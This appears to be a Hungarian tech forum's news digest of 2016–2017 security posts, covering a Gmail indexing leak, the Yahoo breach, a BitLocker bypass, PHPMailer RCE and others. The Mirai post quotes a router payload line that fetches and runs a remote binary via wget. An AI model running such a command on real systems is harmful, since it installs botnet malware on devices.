HUP cikkturkáló

Random Gmail leak

 ( toMpEr | 2017. január 15., vasárnap - 11:35 )

https://www.google.hu/search?q=inurl%3A%22hu%22+site%3Agmail.com&ie=&oe=#q=inurl:%22hu%22+site:mail.google.com&filter=0

Találatok a inurl:"hu" site:mail.google.com keresésre:

  • Dorin Florea: Marosvásárhely kell legyen a központ - Gmail - Google
  • Beérkező levelek (30) -
  • Kézzelfogható történelem (régészet) - Gmail - Google

Semmi komoly, de vajon hogyan történhetett ez? A Google a spiderezésen kívül a Chrome-ban megnyitott oldalak tartalmat is atkuldi a szerverekre?

azonosítás hárdveres ujjlenyomat alapján

 ( esernyofogantyu | 2017. január 14., szombat - 16:22 )

Vidám amerikai diákok hárdveres letapogatás technológiájával 99%-os sikerrel azonosítják az internetezőket. Bemutató februárban, a Network & Distributed System Security Symposium-on.

[forrás]

tudom, mit töltöttél tavaly nyáron

 ( esernyofogantyu | 2017. január 14., szombat - 16:21 )

Egy orosz oldal 460 ezer torrent-ről és 70 millió IP-címről tart fenn adatbázist. Nyilvánosan kereshető, hogy ki, mit tölt le a BitTorrent-rendszerben.

[forrás]

Szabadságot a macskás jelszavaknak!

 ( esernyofogantyu | 2017. január 13., péntek - 19:37 )

Ugyan azt az egyszerű jelszót használnád mindenhová? Semmi gond, majd megoldjuk: ahhoz, hogy második lépcsős biztonsági réteg lehessen a jelszó, mint az SMS-faktor - részlegesen azonosítani kell a számítógépet, amiről bejelentkezünk.

Apple’s 2016 in review

 ( trey | 2017. január 6., péntek - 9:24 )

Chuq Von Rospach, egykori Apple (és Palm) alkalmazott tollából:

Idézet:
This has been the winter of our discontent. 2016 was the year the tone changed. There’s always been a lot of criticism and griping about anything Apple does (and doesn’t do — it can’t win) but in 2016 I feel like the tone of the chatter about Apple changed and got a lot more negative.

This is worrisome on a number of levels and I’ve been thinking about it a lot. I’m used to watching people kvetch about the company, but this seems — different. One reason: a lot of the criticisms are correct.

Apple, for the first time in over a decade, simply isn’t firing on all cylinders. Please don’t interpret that as “Apple is doomed” because it’s not, but there are things it’s doing a lot less well than it could — and has. Apple’s out of sync with itself.

Here are a few of the things I think indicate Apple has gotten itself out of kilter and is in need of some course correction.

Teljes írás: Apple’s 2016 in review

2016-ban a legtöbb sebezhetőség díját nyerte...

 ( toMpEr | 2016. december 31., szombat - 12:23 )

...az Android. Amire 4x annyi sebezhetőséget publikáltak idén, mint a tavalyi évben.

[code]
+----+-------------------+-------------+--------------+---------------------------+
| # | Product Name | Vendor Name | Product Type | Number of Vulnerabilities |
+----+-------------------+-------------+--------------+---------------------------+
| 1 | Android | Google | OS | 523 |
| 2 | Debian Linux | Debian | OS | 319 |

Police Ask for Amazon Echo Data to Help Solve a Murder Case

 ( toMpEr | 2016. december 28., szerda - 11:27 )

As first reported by The Information, authorities in Bentonville have issued a warrant for Amazon to hand over audio or records from an Echo device belonging to James Andrew Bates in the hope that they'll aid in uncovering additional details about the murder of Victor Collins.

PwnScriptum: PHPMailer - Remote Code Execution

 ( toMpEr | 2016. december 26., hétfő - 19:05 )

PHPMailer - "Probably the world's most popular code for sending email from PHP! Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and many more"

R.I.P. CyanogenMod

 ( falu | 2016. december 24., szombat - 22:45 )

...
"We will take pride in our Lineage as we move forward and continue to build on its legacy.

Thank you & Goodbye,
The CyanogenMod Team"

https://www.cyanogenmod.org/blog/a-fork-in-the-road

Titkosítási és adatvédelmi eszközök

 ( DigitalMech | 2016. december 20., kedd - 7:22 )

Egy weboldal, mely egyedülálló magyar nyelvű tudásbázist épített fel online privacy témakörében,
számos titkosítási és adatvédelmi eszközt felsorakoztatva.

https://maganelet.hu/

---------------------
u.i.
Mint arra felhívták a figyelmem,
a fentebb linkeltek magyarított tartalmak, eredeti: https://www.privacytools.io/

Az oldalon említett TED Talks videó Magyar felirattal:

Újabb Yahoo hack: 1 milliárd felhasználói adat

 ( toMpEr | 2016. december 14., szerda - 23:47 )

The company disclosed today that it has discovered a breach of more than one billion user accounts that occurred in August 2013. The breach is believed to be separate and distinct from the theft of data from 500 million accounts that Yahoo reported this September.

“The stolen user account information may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or unencrypted security questions and answers,” Lord added.

https://techcrunch.com/2016/12/14/yahoo-discloses-hack-of-1-billion-accounts/

MLM Ransomware

 ( toMpEr | 2016. december 11., vasárnap - 13:30 )

Nem akarsz 1 BTC-t fizetni az adataid visszaállításáért?
Fertőzd meg másik két ismerősöd és ingyen megkapod a decrypt kulcsot! :)

https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/

Visszaigényelhető lesz az "Artijust" adó

 ( traktor | 2016. december 9., péntek - 16:28 )

444.hu: Visszakaphatod a hordozói díjat, ha nem lopott zenét másolsz ki

Azért nem kapkodnak nagyon: "Az Artisjus az MTI-nek azt mondta, hogy a közös jogkezelők 2017. végéig egy tájékoztató honlapot indítanak az üres hordozó díjról és annak visszatérítési lehetőségeiről."

Addigra talán már pont nem vesz senki üres CD-t. ;) (Igen, tudom, persze, pendrive, HDD.)

A játék és szórakozás internetes kora lejárt

 ( sevil | 2016. december 9., péntek - 14:13 )

http://www.dailydot.com/layer8/bruce-schneier-internet-of-things/

Reménykedem, hogy a biztonságtudatosság növekedésével visszatérhet ez a korszak.

És még egy Android sebezhetőség...

 ( manfreed | 2016. december 2., péntek - 20:26 )

... amivel egyáltalán nem lenne probléma, ha a gyártók komolyabban vennék a frissítéseket, a felhasználók pedig nem hagynák magukra rásózni a ma árult Android 4-es telefonokat.

https://www.xda-developers.com/gooligan-malware-compromises-more-than-a-million-google-accounts-on-android/

Press Shift+F10 to bypass Bitlocker

 ( toMpEr | 2016. november 30., szerda - 11:39 )

Security researcher Sami Laiho discovered this simple method of bypassing BitLocker, wherein an attacker can open a command-line interface with System privileges just by holding SHIFT+F10 while a Windows 10 PC is installing a new OS build.

http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html
http://thehackernews.com/2016/11/windows-bitlocker-bypass.html

New Mirai attack vector – bot exploits a recently discovered router vulnerability

 ( toMpEr | 2016. november 29., kedd - 1:16 )

The router rebooted every 15 to 20 minutes. The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely:
cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2
[...]
The ISPs of the entire world have the need to manage their infrastructure – in particular your modems or routers.
One of those protocols is called TR-064, also know as LAN-Side DSL CPE Configuration

Internet freedom declined in 2016 for the sixth consecutive year.

 ( toMpEr | 2016. november 28., hétfő - 14:39 )

https://freedomhouse.org/report/freedom-net/freedom-net-2016

  • Two-thirds of all internet users – 67 percent – live in countries where criticism of the government, military, or ruling family are subject to censorship.
  • Social media users face unprecedented penalties, as authorities in 38 countries made arrests based on social media posts over the past year. Globally, 27 percent of all internet users live in countries where people have been arrested for publishing, sharing, or merely “liking” content on Facebook.

Microsoft update servers left all Azure RHEL instances hackable

 ( trey | 2016. november 28., hétfő - 13:27 )

"Microsoft has patched flaws that attackers could exploit to compromise all Azure Red Hat Enterprise Linux (RHEL) instances.

Software engineer Ian Duffy found the flaws while building a secure RHEL image for Microsoft Azure. During that process he noticed an installation script Azure uses in its preconfigured RPM Package Manager contains build host information that allows attackers to find all four Red Hat Update Appliances which expose REST APIs over HTTPS.

From there Duffy found a package labelled PrepareRHUI (Red Hat Update Infrastructure) that runs on all Azure RHEL boxes, and contains the rhui-monitor.cloud build host."

Microsoft update servers left all Azure RHEL instances hackable

Cellebrite: Ipari telefon feltörés

 ( toMpEr | 2016. november 23., szerda - 18:36 )

http://phys.org/news/2016-11-israeli-firm-seconds.html

The company has contracts in more than 115 countries, many with governments, and it shot to global prominence in March when it was reported the FBI used its technology to crack the iPhone of one of the jihadist-inspired killers in San Bernardino, California.

The phone in the demonstration, an LG G4 run on Google's Android operating system, is a model Cellebrite had already cracked, so the extraction did not take long.

8-dik osztályos felvételi feladatok és javítókulcsok letöltése

 ( kukacster | 2016. november 21., hétfő - 17:33 )

Közeledik a felvételi a középiskolákba, a régebbi felvételik elérhetők az oktatási minisztérium honlapján. Sajnos a gyakorláshoz-nézegetéshez kézzel elég unalmas letöltögetni a feladatokat és a javítókulcsokat, úgyhogy felraktam egy Bash scriptet, ami ezt megteszi helyettünk. Ha már mind letöltődött, már csak egyetlen sort kell a parancssorba gépelni, és már mind ki is van nyomtatva.

Elérhető a GitHub-on.

secret.ɢoogle.com

 ( toMpEr | 2016. november 21., hétfő - 14:23 )

http://secret.ɢoogle.com

Biztos jo otlet volt UTF8 domain neveket engedelyezni?